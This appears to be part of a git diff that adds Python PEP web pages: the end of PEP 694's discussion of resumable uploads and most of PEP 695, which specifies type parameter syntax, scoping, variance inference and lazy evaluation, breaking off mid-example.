+

Yes!

+

It’s actually the protocol specified in an Active Internet-Draft, where the authors took what they learned implementing tus to provide the idea of resumable uploads in a wholly generic, standards-based way.

+

The only deviation we’ve made from that spec is that we don’t use the +104 Upload Resumption Supported informational response in the first +POST request. This decision was made for a few reasons:

+
    +
  • The 104 Upload Resumption Supported is the only part of that draft +which does not rely entirely on things that are already supported in the +existing standards, since it was adding a new informational status.
  • +
  • Many clients and web frameworks don’t support 1xx informational responses very well, if at all, so adding it would complicate implementation for very little benefit.
  • +
  • The purpose of the 104 Upload Resumption Supported response is to allow clients to determine that an arbitrary endpoint that they’re interacting with supports resumable uploads. Since this PEP mandates support for that in servers, clients can simply assume that the server they are interacting with supports it, which makes the informational response unnecessary.
  • +
  • In theory, if support for 1xx responses improves and the draft is accepted with the informational response included, we can add it at a later date without changing the overall flow of the API.
  • +
+

There is a risk that the above draft doesn’t get accepted, but even if it +does not, that doesn’t actually affect us. It would just mean that our +support for resumable uploads is an application specific protocol, but is +still wholly standards compliant.

+
+
+
+

Open Questions

+
+

Multipart Uploads vs tus

+

This PEP currently bases the actual uploading of files on an internet draft +from tus.io that supports resumable file uploads.

+

That protocol requires a few things:

+
    +
  • That the client selects a secure Upload-Token that they use to identify +uploading a single file.
  • +
  • That if clients don’t upload the entire file in one shot, they have to submit the chunks serially, and in the correct order, with all but the final chunk having an Upload-Incomplete: 1 header.
  • +
  • Resumption of an upload is essentially just querying the server to see how much data it has received, then sending the remaining bytes (either as a single request, or in chunks).
  • +
  • The upload implicitly is completed when the server successfully gets all of +the data from the client.
  • +
+

This has one big benefit: if a client doesn’t care about resuming its upload, it can ignore the client-side work for resumable uploads entirely. It can just POST the file to the URL, and if that doesn’t succeed, it can just POST the whole file again.

+
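A minimal sketch of that simplest case, assuming the third-party requests library; the file URL, helper name, and retry policy are hypothetical, while the Upload-Token header name comes from the draft described above.

import requests  # third-party HTTP client, used only for illustration


def naive_upload(file_url, token, payload, attempts=3):
    # A client that ignores resumption entirely: POST the whole file,
    # and on failure just POST the whole file again.
    for _ in range(attempts):
        response = requests.post(
            file_url,
            data=payload,
            headers={
                "Upload-Token": token,  # header name from the draft
                "Content-Type": "application/octet-stream",
            },
        )
        if response.ok:
            return response
    response.raise_for_status()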

The other benefit is that even if you do want to support resumption, you can still just POST the file, and unless you need to resume the upload, that’s all you have to do.

+

Another, possibly theoretical, benefit is that for hashing the uploaded files, the serial-chunks requirement means that the server can maintain hashing state between requests, update it for each request, then write that state back to storage. Unfortunately this isn’t actually possible to do with Python’s hashlib, though there are some libraries like Rehash that implement it; they don’t support every hash that hashlib does (specifically not blake2 or sha3 at the time of writing).

+

We might also need to reconstitute the uploaded file anyway for processing, to do things like extract metadata from it, which would make this a moot point.

+

The downside is that there is no ability to parallelize the upload of a single +file because each chunk has to be submitted serially.

+

AWS S3 has a similar API (and most blob stores have copied it, either wholesale or with something close to it), which AWS calls multipart uploading.

+

The basic flow for a multipart upload is as follows (a sketch in code follows the list):

+
    +
  1. Initiate a Multipart Upload to get an Upload ID.
  2. Break your file up into chunks, and upload each one of them individually.
  3. Once all chunks have been uploaded, finalize the upload.
     - This is the step where any errors would occur.
+
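Here is a rough, S3-flavored sketch of those steps, assuming the third-party requests library; the endpoints, part numbering, and ETag bookkeeping are hypothetical and only meant to make the three steps concrete.

import requests  # third-party HTTP client, used only for illustration


def multipart_upload(base_url, data, part_size=8 * 1024 * 1024):
    # Step 1 (initiate) is implicit in this PEP: the session would
    # already have created a multipart upload for each file.
    etags = []
    parts = [data[i:i + part_size] for i in range(0, len(data), part_size)]
    for number, part in enumerate(parts, start=1):
        # Step 2: upload each part individually; a failed part can be
        # retried without resending the rest of the file.
        response = requests.put(f"{base_url}/parts/{number}", data=part)
        response.raise_for_status()
        etags.append(response.headers["ETag"])
    # Step 3: finalize the upload; this is where any errors would occur.
    requests.post(f"{base_url}/complete", json={"parts": etags}).raise_for_status()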

It does not directly support resuming an upload, but it allows clients to +control the “blast radius” of failure by adjusting the size of each part +they upload, and if any of the parts fail, they only have to resend those +specific parts.

+

This has a big benefit in that it allows parallelization in uploading files, +allowing clients to maximize their bandwidth using multiple threads to send +the data.

+

We wouldn’t need an explicit step (1), because our session would implicitly +initiate a multipart upload for each file.

+

It does have its own downsides:

+
    +
  • Clients have to do more work on every request to have something resembling +resumable uploads. They would have to break the file up into multiple parts +rather than just making a single POST request, and only needing to deal +with the complexity if something fails.
  • +
  • Clients that don’t care about resumption at all still have to deal with +the third explicit step, though they could just upload the file all as a +single part.
      +
    • S3 works around this by having another API for one-shot uploads, but I’d rather not have two different APIs for uploading the same file.
    • +
    +
  • +
  • Verifying hashes gets somewhat more complicated. AWS implements hashing multipart uploads by hashing each part; the overall hash is then just a hash of those hashes, not of the content itself. We need to know the actual hash of the file itself for PyPI, so we would have to reconstitute the file, read its content, and hash it once it’s been fully uploaded, though we could still use the hash-of-hashes trick for checksumming the upload itself (see the sketch after this list).
      +
    • See above about whether this is actually a downside in practice, or +if it’s just in theory.
    • +
    +
  • +
+
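To make that last bullet concrete, this runnable sketch contrasts the hash of the reassembled content (what PyPI needs) with an AWS-style hash of hashes (usable only for checksumming the upload itself):

import hashlib

parts = [b"first chunk", b"second chunk", b"third chunk"]

# Hash of the reassembled file: requires reconstituting the content.
full_hash = hashlib.sha256(b"".join(parts)).hexdigest()

# AWS-style "hash of hashes": hash each part, then hash the
# concatenated part digests; this checksums the upload, not the file.
digests = b"".join(hashlib.sha256(part).digest() for part in parts)
hash_of_hashes = hashlib.sha256(digests).hexdigest()

assert full_hash != hash_of_hashes  # the two values are not interchangeable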

I lean towards the tus-style resumable uploads, as I think they’re simpler to use and to implement, and the main downside is that we possibly leave some multi-threaded performance on the table, which I think I’m personally fine with.

+

I guess one additional benefit of the S3-style multipart uploads is that you don’t have to implement any sort of protection against parallel uploads, since they’re simply supported. That alone might erase most of the server-side implementation simplification.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0694.rst

+

Last modified: 2024-07-10 21:28:34 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0695/index.html b/pep-0695/index.html new file mode 100644 index 00000000000..9f7339ae41f --- /dev/null +++ b/pep-0695/index.html @@ -0,0 +1,1707 @@ PEP 695 – Type Parameter Syntax | peps.python.org
+
+


+ + +
+
+
+

PEP 695 – Type Parameter Syntax

+
+
Author:
+
Eric Traut <erictr at microsoft.com>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Typing-SIG thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
15-Jun-2022
+
Python-Version:
+
3.12
+
Post-History:
+
20-Jun-2022, +04-Dec-2022
+
Resolution:
+
Discourse message
+
+
+
+
+
+

Attention

+

This PEP is a historical document: see Variance Inference, Type aliases, Type parameter lists, The type statement and Annotation scopes for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+


+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

This PEP specifies an improved syntax for specifying type parameters within +a generic class, function, or type alias. It also introduces a new statement +for declaring type aliases.

+
+
+

Motivation

+

PEP 484 introduced type variables into the language. PEP 612 built +upon this concept by introducing parameter specifications, and +PEP 646 added variadic type variables.

+

While generic types and type parameters have grown in popularity, the +syntax for specifying type parameters still feels “bolted on” to Python. +This is a source of confusion among Python developers.

+

There is consensus within the Python static typing community that it is time +to provide a formal syntax that is similar to other modern programming +languages that support generic types.

+

An analysis of 25 popular typed Python libraries revealed that type +variables (in particular, the typing.TypeVar symbol) were used in +14% of modules.

+
+

Points of Confusion

+

While the use of type variables has become widespread, the manner in which +they are specified within code is the source of confusion among many +Python developers. There are a couple of factors that contribute to this +confusion.

+

The scoping rules for type variables are difficult to understand. Type +variables are typically allocated within the global scope, but their semantic +meaning is valid only when used within the context of a generic class, +function, or type alias. A single runtime instance of a type variable may be +reused in multiple generic contexts, and it has a different semantic meaning +in each of these contexts. This PEP proposes to eliminate this source of +confusion by declaring type parameters at a natural place within a class, +function, or type alias declaration statement.

+

Generic type aliases are often misused because it is not clear to developers +that a type argument must be supplied when the type alias is used. This leads +to an implied type argument of Any, which is rarely the intent. This PEP +proposes to add new syntax that makes generic type alias declarations +clear.

+

PEP 483 and PEP 484 introduced the concept of “variance” for a type +variable used within a generic class. Type variables can be invariant, +covariant, or contravariant. The concept of variance is an advanced detail +of type theory that is not well understood by most Python developers, yet +they must confront this concept today when defining their first generic +class. This PEP largely eliminates the need for most developers +to understand the concept of variance when defining generic classes.

+

When more than one type parameter is used with a generic class or type alias, +the rules for type parameter ordering can be confusing. It is normally based on +the order in which they first appear within a class or type alias declaration +statement. However, this can be overridden in a class definition by +including a “Generic” or “Protocol” base class. For example, in the class +declaration class ClassA(Mapping[K, V]), the type parameters are +ordered as K and then V. However, in the class declaration +class ClassB(Mapping[K, V], Generic[V, K]), the type parameters are +ordered as V and then K. This PEP proposes to make type parameter +ordering explicit in all cases.

+

The practice of sharing a type variable across multiple generic contexts creates other problems today. Modern editors provide features like “find all references” and “rename all references” that operate on symbols at the semantic level. When a type parameter is shared among multiple generic classes, functions, and type aliases, all references are semantically equivalent, so these features cannot distinguish between uses in one generic context and another.

+

Type variables defined within the global scope also need to be given a name that starts with an underscore to indicate that the variable is private to the module. Globally-defined type variables are also often given names to indicate their variance, leading to cumbersome names like “_T_contra” and “_KT_co”. The current mechanisms for allocating type variables also require the developer to supply a redundant name in quotes (e.g. T = TypeVar("T")). This PEP eliminates the need for the redundant name and cumbersome variable names.

+

Defining type parameters today requires importing the TypeVar and +Generic symbols from the typing module. Over the past several releases +of Python, efforts have been made to eliminate the need to import typing +symbols for common use cases, and the PEP furthers this goal.

+
+
+
+

Summary Examples

+

Defining a generic class prior to this PEP looks something like this.

+
from typing import Generic, TypeVar
+
+_T_co = TypeVar("_T_co", covariant=True, bound=str)
+
+class ClassA(Generic[_T_co]):
+    def method1(self) -> _T_co:
+        ...
+
+
+

With the new syntax, it looks like this.

+
class ClassA[T: str]:
+    def method1(self) -> T:
+        ...
+
+
+

Here is an example of a generic function today.

+
from typing import TypeVar
+
+_T = TypeVar("_T")
+
+def func(a: _T, b: _T) -> _T:
+    ...
+
+
+

And the new syntax.

+
def func[T](a: T, b: T) -> T:
+    ...
+
+
+

Here is an example of a generic type alias today.

+
from typing import TypeAlias, TypeVar
+
+_T = TypeVar("_T")
+
+ListOrSet: TypeAlias = list[_T] | set[_T]
+
+
+

And with the new syntax.

+
type ListOrSet[T] = list[T] | set[T]
+
+
+
+
+

Specification

+
+

Type Parameter Declarations

+

This PEP introduces a new syntax for declaring type parameters for generic classes, functions, and type aliases. The syntax adds support for a comma-delimited list of type parameters in square brackets after the name of the class, function, or type alias.

+

Simple (non-variadic) type variables are declared with an unadorned name. +Variadic type variables are preceded by * (see PEP 646 for details). +Parameter specifications are preceded by ** (see PEP 612 for details).

+
# This generic class is parameterized by a TypeVar T, a
+# TypeVarTuple Ts, and a ParamSpec P.
+class ChildClass[T, *Ts, **P]: ...
+
+
+

There is no need to include Generic as a base class. Its inclusion as +a base class is implied by the presence of type parameters, and it will +automatically be included in the __mro__ and __orig_bases__ attributes +for the class. The explicit use of a Generic base class will result in a +runtime error.

+
class ClassA[T](Generic[T]): ...  # Runtime error
+
+
+

A Protocol base class with type arguments may generate a runtime error. Type checkers should generate an error in this case because the use of type arguments is not needed, and the order of type parameters for the class is no longer dictated by their order in the Protocol base class.

+
class ClassA[S, T](Protocol): ... # OK
+
+class ClassB[S, T](Protocol[S, T]): ... # Recommended type checker error
+
+
+

Type parameter names within a generic class, function, or type alias must be +unique within that same class, function, or type alias. A duplicate name +generates a syntax error at compile time. This is consistent with the +requirement that parameter names within a function signature must be unique.

+
class ClassA[T, *T]: ... # Syntax Error
+
+def func1[T, **T](): ... # Syntax Error
+
+
+

Class type parameter names are mangled if they begin with a double +underscore, to avoid complicating the name lookup mechanism for names used +within the class. However, the __name__ attribute of the type parameter +will hold the non-mangled name.

+
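A small sketch of this behavior, assuming a Python version that implements this PEP (3.12+):

class ClassA[__T]:
    # Inside the class body, references to __T are mangled to
    # _ClassA__T, just like other class-private names.
    def method1(self) -> __T: ...

# The TypeVar itself keeps the non-mangled name.
print(ClassA.__type_params__[0].__name__)  # prints '__T'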
+
+

Upper Bound Specification

+

For a non-variadic type parameter, an “upper bound” type can be specified +through the use of a type annotation expression. If an upper bound is +not specified, the upper bound is assumed to be object.

+
class ClassA[T: str]: ...
+
+
+

The specified upper bound type must use an expression form that is allowed in +type annotations. More complex expression forms should be flagged +as an error by a type checker. Quoted forward references are allowed.

+

The specified upper bound type must be concrete. An attempt to use a generic +type should be flagged as an error by a type checker. This is consistent with +the existing rules enforced by type checkers for a TypeVar constructor call.

+
class ClassA[T: dict[str, int]]: ...  # OK
+
+class ClassB[T: "ForwardReference"]: ...  # OK
+
+class ClassC[V]:
+    class ClassD[T: dict[str, V]]: ...  # Type checker error: generic type
+
+class ClassE[T: [str, int]]: ...  # Type checker error: illegal expression form
+
+
+
+
+

Constrained Type Specification

+

PEP 484 introduced the concept of a “constrained type variable” which is +constrained to a set of two or more types. The new syntax supports this type +of constraint through the use of a literal tuple expression that contains +two or more types.

+
class ClassA[AnyStr: (str, bytes)]: ...  # OK
+
+class ClassB[T: ("ForwardReference", bytes)]: ...  # OK
+
+class ClassC[T: ()]: ...  # Type checker error: two or more types required
+
+class ClassD[T: (str, )]: ...  # Type checker error: two or more types required
+
+t1 = (bytes, str)
+class ClassE[T: t1]: ...  # Type checker error: literal tuple expression required
+
+
+

If the specified type is not a tuple expression or the tuple expression includes +complex expression forms that are not allowed in a type annotation, a type +checker should generate an error. Quoted forward references are allowed.

+
class ClassF[T: (3, bytes)]: ...  # Type checker error: invalid expression form
+
+
+

The specified constrained types must be concrete. An attempt to use a generic +type should be flagged as an error by a type checker. This is consistent with +the existing rules enforced by type checkers for a TypeVar constructor call.

+
class ClassG[T: (list[S], str)]: ...  # Type checker error: generic type
+
+
+
+
+

Runtime Representation of Bounds and Constraints

+

The upper bounds and constraints of TypeVar objects are accessible at +runtime through the __bound__ and __constraints__ attributes. +For TypeVar objects defined through the new syntax, these attributes +become lazily evaluated, as discussed under Lazy Evaluation below.

+
+
+

Generic Type Alias

+

We propose to introduce a new statement for declaring type aliases. Similar +to class and def statements, a type statement defines a scope +for type parameters.

+
# A non-generic type alias
+type IntOrStr = int | str
+
+# A generic type alias
+type ListOrSet[T] = list[T] | set[T]
+
+
+

Type aliases can refer to themselves without the use of quotes.

+
# A type alias that includes a forward reference
+type AnimalOrVegetable = Animal | "Vegetable"
+
+# A generic self-referential type alias
+type RecursiveList[T] = T | list[RecursiveList[T]]
+
+
+

The type keyword is a new soft keyword. It is interpreted as a keyword +only in this part of the grammar. In all other locations, it is assumed to +be an identifier name.

+
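For example, assuming a Python version implementing this PEP (3.12+), type remains usable as an ordinary identifier outside the type-alias position:

type = "an ordinary identifier here"  # shadows the builtin, but is legal

type Alias = int  # here 'type' is parsed as the soft keyword

print(Alias)  # prints the type alias 'Alias'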

Type parameters declared as part of a generic type alias are valid only +when evaluating the right-hand side of the type alias.

+

As with typing.TypeAlias, type checkers should restrict the right-hand +expression to expression forms that are allowed within type annotations. +The use of more complex expression forms (call expressions, ternary operators, +arithmetic operators, comparison operators, etc.) should be flagged as an +error.

+

Type alias expressions are not allowed to use traditional type variables (i.e. +those allocated with an explicit TypeVar constructor call). Type checkers +should generate an error in this case.

+
T = TypeVar("T")
+type MyList = list[T]  # Type checker error: traditional type variable usage
+
+
+

We propose to deprecate the existing typing.TypeAlias introduced in +PEP 613. The new syntax eliminates its need entirely.

+
+
+

Runtime Type Alias Class

+

At runtime, a type statement will generate an instance of +typing.TypeAliasType. This class represents the type. Its attributes +include:

+
    +
  • __name__ is a str representing the name of the type alias
  • +
  • __type_params__ is a tuple of TypeVar, TypeVarTuple, or +ParamSpec objects that parameterize the type alias if it is generic
  • +
  • __value__ is the evaluated value of the type alias
  • +
+

All of these attributes are read-only.

+

The value of the type alias is evaluated lazily (see Lazy Evaluation below).

+
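For example, on a Python version implementing this PEP (3.12+), these attributes can be inspected directly:

type ListOrSet[T] = list[T] | set[T]

print(type(ListOrSet).__name__)   # 'TypeAliasType'
print(ListOrSet.__name__)         # 'ListOrSet'
print(ListOrSet.__type_params__)  # (T,)
print(ListOrSet.__value__)        # list[T] | set[T], evaluated lazily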
+
+

Type Parameter Scopes

+

When the new syntax is used, a new lexical scope is introduced, and this scope +includes the type parameters. Type parameters can be accessed by name +within inner scopes. As with other symbols in Python, an inner scope can +define its own symbol that overrides an outer-scope symbol of the same name. +This section provides a verbal description of the new scoping rules. +The Scoping Behavior section below specifies the behavior in terms +of a translation to near-equivalent existing Python code.

+

Type parameters are visible to other +type parameters declared elsewhere in the list. This allows type parameters +to use other type parameters within their definition. While there is currently +no use for this capability, it preserves the ability in the future to support +upper bound expressions or type argument defaults that depend on earlier +type parameters.

+

A compiler error or runtime exception is generated if the definition of an +earlier type parameter references a later type parameter even if the name is +defined in an outer scope.

+
# The following generates no compiler error, but a type checker
+# should generate an error because an upper bound type must be concrete,
+# and ``Sequence[S]`` is generic. Future extensions to the type system may
+# eliminate this limitation.
+class ClassA[S, T: Sequence[S]]: ...
+
+# The following generates no compiler error, because the bound for ``S``
+# is lazily evaluated. However, type checkers should generate an error.
+class ClassB[S: Sequence[T], T]: ...
+
+
+

A type parameter declared as part of a generic class is valid within the +class body and inner scopes contained therein. Type parameters are also +accessible when evaluating the argument list (base classes and any keyword +arguments) that comprise the class definition. This allows base classes +to be parameterized by these type parameters. Type parameters are not +accessible outside of the class body, including class decorators.

+
class ClassA[T](BaseClass[T], param = Foo[T]): ...  # OK
+
+print(T)  # Runtime error: 'T' is not defined
+
+@dec(Foo[T])  # Runtime error: 'T' is not defined
+class ClassA[T]: ...
+
+
+

A type parameter declared as part of a generic function is valid within +the function body and any scopes contained therein. It is also valid within +parameter and return type annotations. Default argument values for function +parameters are evaluated outside of this scope, so type parameters are +not accessible in default value expressions. Likewise, type parameters are not +in scope for function decorators.

+
def func1[T](a: T) -> T: ...  # OK
+
+print(T)  # Runtime error: 'T' is not defined
+
+def func2[T](a = list[T]): ...  # Runtime error: 'T' is not defined
+
+@dec(list[T])  # Runtime error: 'T' is not defined
+def func3[T](): ...
+
+
+

A type parameter declared as part of a generic type alias is valid within +the type alias expression.

+
type Alias1[K, V] = Mapping[K, V] | Sequence[K]
+
+
+

Type parameter symbols defined in outer scopes cannot be bound with +nonlocal statements in inner scopes.

+
S = 0
+
+def outer1[S]():
+    S = 1
+    T = 1
+
+    def outer2[T]():
+
+        def inner1():
+            nonlocal S  # OK because it binds variable S from outer1
+            nonlocal T  # Syntax error: nonlocal binding not allowed for type parameter
+
+        def inner2():
+            global S  # OK because it binds variable S from global scope
+
+
+

The lexical scope introduced by the new type parameter syntax is unlike +traditional scopes introduced by a def or class statement. A type +parameter scope acts more like a temporary “overlay” to the containing scope. +The only new symbols contained +within its symbol table are the type parameters defined using the new syntax. +References to all other symbols are treated as though they were found within +the containing scope. This allows base class lists (in class definitions) and +type annotation expressions (in function definitions) to reference symbols +defined in the containing scope.

+
class Outer:
+    class Private:
+        pass
+
+    # If the type parameter scope was like a traditional scope,
+    # the base class 'Private' would not be accessible here.
+    class Inner[T](Private, Sequence[T]):
+        pass
+
+    # Likewise, 'Inner' would not be available in these type annotations.
+    def method1[T](self, a: Inner[T]) -> Inner[T]:
+        return a
+
+
+

The compiler allows inner scopes to define a local symbol that overrides an +outer-scoped type parameter.

+

Consistent with the scoping rules defined in PEP 484, type checkers should +generate an error if inner-scoped generic classes, functions, or type aliases +reuse the same type parameter name as an outer scope.

+
T = 0
+
+@decorator(T)  # Argument expression `T` evaluates to 0
+class ClassA[T](Sequence[T]):
+    T = 1
+
+    # All methods below should result in a type checker error
+    # "type parameter 'T' already in use" because they are using the
+    # type parameter 'T', which is already in use by the outer scope
+    # 'ClassA'.
+    def method1[T](self):
+        ...
+
+    def method2[T](self, x = T):  # Parameter 'x' gets default value of 1
+        ...
+
+    def method3[T](self, x: T):  # Parameter 'x' has type T (scoped to method3)
+        ...
+
+
+

Symbols referenced in inner scopes are resolved using existing rules except +that type parameter scopes are also considered during name resolution.

+
T = 0
+
+# T refers to the global variable
+print(T)  # Prints 0
+
+class Outer[T]:
+    T = 1
+
+    # T refers to the local variable scoped to class 'Outer'
+    print(T)  # Prints 1
+
+    class Inner1:
+        T = 2
+
+        # T refers to the local type variable within 'Inner1'
+        print(T)  # Prints 2
+
+        def inner_method(self):
+            # T refers to the type parameter scoped to class 'Outer';
+            # If 'Outer' did not use the new type parameter syntax,
+            # this would instead refer to the global variable 'T'
+            print(T)  # Prints 'T'
+
+    def outer_method(self):
+        T = 3
+
+        # T refers to the local variable within 'outer_method'
+        print(T)  # Prints 3
+
+        def inner_func():
+            # T refers to the variable captured from 'outer_method'
+            print(T)  # Prints 3
+
+
+

When the new type parameter syntax is used for a generic class, assignment +expressions are not allowed within the argument list for the class definition. +Likewise, with functions that use the new type parameter syntax, assignment +expressions are not allowed within parameter or return type annotations, nor +are they allowed within the expression that defines a type alias, or within +the bounds and constraints of a TypeVar. Similarly, yield, yield from, +and await expressions are disallowed in these contexts.

+

This restriction is necessary because expressions evaluated within the +new lexical scope should not introduce symbols within that scope other than +the defined type parameters, and should not affect whether the enclosing function +is a generator or coroutine.

+
class ClassA[T]((x := Sequence[T])): ...  # Syntax error: assignment expression not allowed
+
+def func1[T](val: (x := int)): ...  # Syntax error: assignment expression not allowed
+
+def func2[T]() -> (x := Sequence[T]): ...  # Syntax error: assignment expression not allowed
+
+type Alias1[T] = (x := list[T])  # Syntax error: assignment expression not allowed
+
+
+
+
+

Accessing Type Parameters at Runtime

+

A new attribute called __type_params__ is available on generic classes, +functions, and type aliases. This attribute is a tuple of the +type parameters that parameterize the class, function, or alias. +The tuple contains TypeVar, ParamSpec, and TypeVarTuple instances.

+

Type parameters declared using the new syntax will not appear within the +dictionary returned by globals() or locals().

+
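A short, runnable illustration of both points (Python 3.12+):

class Pair[K, V]: ...

def first[T](items: list[T]) -> T:
    return items[0]

type Alias[T] = list[T]

print(Pair.__type_params__)   # (K, V)
print(first.__type_params__)  # (T,)
print(Alias.__type_params__)  # (T,)

# The type parameters do not leak into the module namespace:
print("K" in globals())  # False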
+
+

Variance Inference

+

This PEP eliminates the need for variance to be specified for type +parameters. Instead, type checkers will infer the variance of type parameters +based on their usage within a class. Type parameters are inferred to be +invariant, covariant, or contravariant depending on how they are used.

+

Python type checkers already include the ability to determine the variance of +type parameters for the purpose of validating variance within a generic +protocol class. This capability can be used for all classes (whether or not +they are protocols) to calculate the variance of each type parameter.

+

The algorithm for computing the variance of a type parameter is as follows.

+

For each type parameter in a generic class:

+

1. If the type parameter is variadic (TypeVarTuple) or a parameter +specification (ParamSpec), it is always considered invariant. No further +inference is needed.

+

2. If the type parameter comes from a traditional TypeVar declaration and +is not specified as infer_variance (see below), its variance is specified +by the TypeVar constructor call. No further inference is needed.

+

3. Create two specialized versions of the class. We’ll refer to these as +upper and lower specializations. In both of these specializations, +replace all type parameters other than the one being inferred by a dummy type +instance (a concrete anonymous class that is type compatible with itself and +assumed to meet the bounds or constraints of the type parameter). In +the upper specialized class, specialize the target type parameter with +an object instance. This specialization ignores the type parameter’s +upper bound or constraints. In the lower specialized class, specialize +the target type parameter with itself (i.e. the corresponding type argument +is the type parameter itself).

+

4. Determine whether lower can be assigned to upper using normal type +compatibility rules. If so, the target type parameter is covariant. If not, +determine whether upper can be assigned to lower. If so, the target +type parameter is contravariant. If neither of these combinations are +assignable, the target type parameter is invariant.

+

Here is an example.

+
class ClassA[T1, T2, T3](list[T1]):
+    def method1(self, a: T2) -> None:
+        ...
+
+    def method2(self) -> T3:
+        ...
+
+
+

To determine the variance of T1, we specialize ClassA as follows:

+
upper = ClassA[object, Dummy, Dummy]
+lower = ClassA[T1, Dummy, Dummy]
+
+
+

We find that upper is not assignable to lower using normal type +compatibility rules defined in PEP 484. Likewise, lower is not assignable +to upper, so we conclude that T1 is invariant.

+

To determine the variance of T2, we specialize ClassA as follows:

+
upper = ClassA[Dummy, object, Dummy]
+lower = ClassA[Dummy, T2, Dummy]
+
+
+

Since upper is assignable to lower, T2 is contravariant.

+

To determine the variance of T3, we specialize ClassA as follows:

+
upper = ClassA[Dummy, Dummy, object]
+lower = ClassA[Dummy, Dummy, T3]
+
+
+

Since lower is assignable to upper, T3 is covariant.

+
+
+

Auto Variance For TypeVar

+

The existing TypeVar class constructor accepts keyword parameters named +covariant and contravariant. If both of these are False, the +type variable is assumed to be invariant. We propose to add another keyword +parameter named infer_variance indicating that a type checker should use +inference to determine whether the type variable is invariant, covariant or +contravariant. A corresponding instance variable __infer_variance__ can be +accessed at runtime to determine whether the variance is inferred. Type +variables that are implicitly allocated using the new syntax will always +have __infer_variance__ set to True.

+
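A small runtime illustration (Python 3.12+), showing both the explicit keyword parameter and the behavior of new-style type parameters:

from typing import TypeVar

T1 = TypeVar("T1", infer_variance=True)
print(T1.__infer_variance__)  # True

class ClassA[T]: ...

# Type variables implicitly allocated by the new syntax always
# have inferred variance.
print(ClassA.__type_params__[0].__infer_variance__)  # True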

A generic class that uses the traditional syntax may include combinations of +type variables with explicit and inferred variance.

+
T1 = TypeVar("T1", infer_variance=True)  # Inferred variance
+T2 = TypeVar("T2")  # Invariant
+T3 = TypeVar("T3", covariant=True)  # Covariant
+
+# A type checker should infer the variance for T1 but use the
+# specified variance for T2 and T3.
+class ClassA(Generic[T1, T2, T3]): ...
+
+
+
+
+

Compatibility with Traditional TypeVars

+

The existing mechanism for allocating TypeVar, TypeVarTuple, and +ParamSpec is retained for backward compatibility. However, these +“traditional” type variables should not be combined with type parameters +allocated using the new syntax. Such a combination should be flagged as +an error by type checkers. This is necessary because the type parameter +order is ambiguous.

+

It is OK to combine traditional type variables with new-style type parameters +if the class, function, or type alias does not use the new syntax. The +new-style type parameters must come from an outer scope in this case.

+
K = TypeVar("K")
+
+class ClassA[V](dict[K, V]): ...  # Type checker error
+
+class ClassB[K, V](dict[K, V]): ...  # OK
+
+class ClassC[V]:
+    # The use of K and V for "method1" is OK because it uses the
+    # "traditional" generic function mechanism where type parameters
+    # are implicit. In this case V comes from an outer scope (ClassC)
+    # and K is introduced implicitly as a type parameter for "method1".
+    def method1(self, a: V, b: K) -> V | K: ...
+
+    # The use of M and K are not allowed for "method2". A type checker
+    # should generate an error in this case because this method uses the
+    # new syntax for type parameters, and all type parameters associated
+    # with the method must be explicitly declared. In this case, ``K``
+    # is not declared by "method2", nor is it supplied by a new-style
+    # type parameter defined in an outer scope.
+    def method2[M](self, a: M, b: K) -> M | K: ...
+
+
+
+
+
+

Runtime Implementation

+
+

Grammar Changes

+

This PEP introduces a new soft keyword type. It modifies the grammar +in the following ways:

+
    +
  1. Addition of optional type parameter clause in class and def statements.
+
type_params: '[' t=type_param_seq  ']'
+
+type_param_seq: a[asdl_typeparam_seq*]=','.type_param+ [',']
+
+type_param:
+    | a=NAME b=[type_param_bound]
+    | '*' a=NAME
+    | '**' a=NAME
+
+type_param_bound: ":" e=expression
+
+# Grammar definitions for class_def_raw and function_def_raw are modified
+# to reference type_params as an optional syntax element. The definitions
+# of class_def_raw and function_def_raw are simplified here for brevity.
+
+class_def_raw: 'class' n=NAME t=[type_params] ...
+
+function_def_raw: a=[ASYNC] 'def' n=NAME t=[type_params] ...
+
+
+
    +
  2. Addition of a new type statement for defining type aliases.
+
type_alias: "type" n=NAME t=[type_params] '=' b=expression
+
+
+
+
+

AST Changes

+

This PEP introduces a new AST node type called TypeAlias.

+
TypeAlias(expr name, typeparam* typeparams, expr value)
+
+
+

It also adds an AST node type that represents a type parameter.

+
typeparam = TypeVar(identifier name, expr? bound)
+    | ParamSpec(identifier name)
+    | TypeVarTuple(identifier name)
+
+
+

Bounds and constraints are represented identically in the AST. In the implementation, +any expression that is a Tuple AST node is treated as a constraint, and any other +expression is treated as a bound.

+

It also modifies existing AST node types FunctionDef, AsyncFunctionDef +and ClassDef to include an additional optional attribute called +typeparams that includes a list of type parameters associated with the +function or class.

+
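These nodes can be inspected with the ast module on a Python version implementing this PEP (3.12+); note that in the released CPython implementation the attribute is spelled type_params:

import ast

tree = ast.parse("type ListOrSet[T] = list[T] | set[T]")
print(ast.dump(tree.body[0], indent=2))
# Dumps a TypeAlias node with its name, type parameters, and value.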
+
+

Lazy Evaluation

+

This PEP introduces three new contexts where expressions may occur that represent +static types: TypeVar bounds, TypeVar constraints, and the value of type +aliases. These expressions may contain references to names +that are not yet defined. For example, type aliases may be recursive, or even mutually +recursive, and type variable bounds may refer back to the current class. If these +expressions were evaluated eagerly, users would need to enclose such expressions in +quotes to prevent runtime errors. PEP 563 and PEP 649 detail the problems with +this situation for type annotations.

+

To prevent a similar situation with the new syntax proposed in this PEP, we propose +to use lazy evaluation for these expressions, similar to the approach in PEP 649. +Specifically, each expression will be saved in a code object, and the code object +is evaluated only when the corresponding attribute is accessed (TypeVar.__bound__, +TypeVar.__constraints__, or TypeAlias.__value__). After the value is +successfully evaluated, the value is saved and later calls will return the same value +without re-evaluating the code object.

+

If PEP 649 is implemented, additional evaluation mechanisms should be added to +mirror the options that PEP provides for annotations. In the current version of the +PEP, that might include adding an __evaluate_bound__ method to TypeVar taking +a format parameter with the same meaning as in PEP 649’s __annotate__ method +(and a similar __evaluate_constraints__ method, as well as an __evaluate_value__ +method on TypeAliasType). +However, until PEP 649 is accepted and implemented, only the default evaluation format +(PEP 649’s “VALUE” format) will be supported.

+

As a consequence of lazy evaluation, the value observed for an attribute may +depend on the time the attribute is accessed.

+
X = int
+
